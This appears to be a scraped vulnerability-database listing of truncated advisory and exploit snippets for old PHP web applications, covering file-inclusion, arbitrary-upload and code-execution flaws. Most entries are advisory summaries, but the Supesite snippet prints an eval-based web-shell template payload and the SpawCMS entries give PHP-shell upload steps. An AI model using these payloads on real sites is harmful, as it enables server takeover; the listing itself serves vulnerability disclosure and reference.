SA-CONTRIB-2010-015 - Signwriter - Arbitrary code execution

The Signwriter module allows the use of TrueType fonts to replace text in headings, blocks, menus and filtered text. This vulnerability allows a remote attacker with the ability to create content using an input filter created with a Signwriter profile to execute arbitrary PHP code on an affected...

TinyBrowser Component for Joomla! 'tinybrowser_lang' Cookie Local File Include

The version of the TinyBrowser component for Joomla! running on the remote host is affected by a local file include vulnerability due to improper sanitization of user-supplied input to the 'tinybrowserlang' cookie before using it in the tinymce/plugins/tinybrowser/folders.php script to include PH...

Bits Video Script 2.042.05 - addvideo.php Arbitrary File Upload Arbitrary PHP Code Execution

Bits Video Script 2.042.05 - addvideo.php Arbitrary File Upload Arbitrary PHP Code Execution source: https://www.securityfocus.com/bid/40712/info Bits Video Script is prone to multiple arbitrary-file-upload vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can...

Bits Video Script 2.04/2.05 - '/register.php' Arbitrary File Upload / Arbitrary PHP Code Execution

source: https://www.securityfocus.com/bid/40712/info Bits Video Script is prone to multiple arbitrary-file-upload vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit these vulnerabilities to upload arbitrary code and run it in the context of the...

Bits Video Script 2.042.05 - register.php Arbitrary File Upload Arbitrary PHP Code Execution

Bits Video Script 2.042.05 - register.php Arbitrary File Upload Arbitrary PHP Code Execution source: https://www.securityfocus.com/bid/40712/info Bits Video Script is prone to multiple arbitrary-file-upload vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can...

Bits Video Script 2.04/2.05 - '/addvideo.php' Arbitrary File Upload / Arbitrary PHP Code Execution

source: https://www.securityfocus.com/bid/40712/info Bits Video Script is prone to multiple arbitrary-file-upload vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit these vulnerabilities to upload arbitrary code and run it in the context of the...

Supesite7 the background to get shell-vulnerability warning-the black bar safety net

PHP code !-- eval $content = "@eval$POSTc";-- !-- eval $test1 = ""."?"." php ".$ content."?& gt;";-- !-- eval fputsfopenSROOT.'./ templates/default/modelcache.php','w+',$test1;-- Edit the template when writing these few lines,disassemble the written word,on the line...

phpwind 7.5 apps/groups/index.php远程包含漏洞

apps/groups/index.php 里$route和$basePath变量没有初始化,导致远程包含或者本地包含php文件,导致执行任意php代码 ?php if $route == "groups" requireonce $basePath . '/action/mgroups.php'; elseif $route == "group" requireonce $basePath . '/action/mgroup.php'; elseif $route == "galbum" requireonce $basePath . '/action/mgalbum.php';...

Calendarix 0.7 - 'calpath' Remote File Inclusion

source: https://www.securityfocus.com/bid/37673/info Calendarix is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the...

Calendarix 0.7 - calpath Remote File Inclusion

Calendarix 0.7 - calpath Remote File Inclusion source: https://www.securityfocus.com/bid/37673/info Calendarix is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file containi...

phpLDAPadmin < 1.2 Local File Inclusion

Binary data 5291.prm...

SpawCMS Editor Shell Upload Vulnerability

No description provided by source. Author: j4ck j4ck from elitehackers.pl [email protected] just go to directory http:/server/path/spaw/demo.php then use image Upload, select all filetypes, and You can upload your evil PHP code, for example phpshell. Shell will be uploaded to selected directory...

SpawCMS Editor - Arbitrary File Upload

SpawCMS Editor - Arbitrary File Upload Author: j4ck j4ck from elitehackers.pl [email protected] just go to directory http:/server/path/spaw/demo.php then use image Upload, select all filetypes, and You can upload your evil PHP code, for example phpshell. Shell will be uploaded to selected...

SpawCMS Editor Shell Upload Vulnerability

Exploit for unknown platform in category web applications ========================================= SpawCMS Editor Shell Upload Vulnerability ========================================= just go to directory http:/server/path/spaw/demo.php then use image Upload, select all filetypes, and You can...

SpawCMS Editor - Arbitrary File Upload

Author: j4ck j4ck from elitehackers.pl [email protected] just go to directory http:/server/path/spaw/demo.php then use image Upload, select all filetypes, and You can upload your evil PHP code, for example phpshell. Shell will be uploaded to selected directory...

Remote file inclusion

PHP remote file inclusion vulnerability in index.php in Cromosoft Technologies Facil Helpdesk 2.3 Lite allows remote attackers to execute arbitrary PHP code via a URL in the lng parameter. NOTE: this can also be leveraged to include and execute arbitrary local files via .. dot dot sequences...

CVE-2009-4543

PHP remote file inclusion vulnerability in index.php in Cromosoft Technologies Facil Helpdesk 2.3 Lite allows remote attackers to execute arbitrary PHP code via a URL in the lng parameter. NOTE: this can also be leveraged to include and execute arbitrary local files via .. dot dot sequences...

PhotoKorn 1.542 - Cross-Site Scripting Remote File Inclusion

PhotoKorn 1.542 - Cross-Site Scripting Remote File Inclusion source: https://www.securityfocus.com/bid/37559/info Photokorn is prone to a cross-site scripting vulnerability and a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker can exploi...

PhotoKorn 1.542 - Cross-Site Scripting / Remote File Inclusion

source: https://www.securityfocus.com/bid/37559/info Photokorn is prone to a cross-site scripting vulnerability and a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker can exploit these issues to execute malicious PHP code in the context o...

Remote file inclusion

Multiple PHP remote file inclusion vulnerabilities in PHPope 1.0.0 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the 1 GLOBALSconfigdirplugins parameter to plugins/address/admin/index.php, 2 GLOBALSconfigdirfunctions parameter to plugins/im/compose.php, and 3...